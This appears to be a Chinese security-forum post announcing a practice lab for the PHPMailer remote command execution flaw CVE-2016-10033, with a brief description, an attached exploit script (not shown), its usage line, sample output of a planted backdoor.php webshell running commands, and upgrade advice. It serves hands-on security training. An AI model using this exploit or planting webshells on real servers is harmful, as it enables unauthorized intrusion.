PHPMailer < 5.2.18 远程命令执行漏洞靶场 (CVE-2016-10033)

靶场地址：http://118.89.165.111:10001/


一，漏洞简介
PHPMailer是一个强大的 PHP 编写的邮件发送类，使用它可以更加便捷的发送邮件，并且还能发送附件和 HTML 格式的邮件，同时还能使用 SMTP 服务器来发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞，攻击者只需巧妙地构造出一个恶意邮箱地址，即可写入任意文件，造成远程命令执行的危害

二，漏洞利用poc: exp.sh (1.96 KB, 下载次数: 42)

2017-5-10 21:11 上传

点击文件名下载附件
exp.sh
阅读权限: 10



exp用法：1,$ ./exp.sh host:port
运行后，就会向服务器中写入 backdoor.php 文件(写入的物理路径见exp.sh,默认写入到/var/www/html/目录下)
然后会看到如下信息：

[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting 127.0.0.1:8000
[+] Target exploited, acessing shell at http://127.0.0.1:8000/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoamiwww-dataRemoteShell> id
[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)
三,修复措施
升级到最新版即可











请尽情玩耍，玩的开心帮忙宣传下论坛。
靶场bug反馈邮箱：LoveYou@bugku.com

谢谢楼主

lai kankan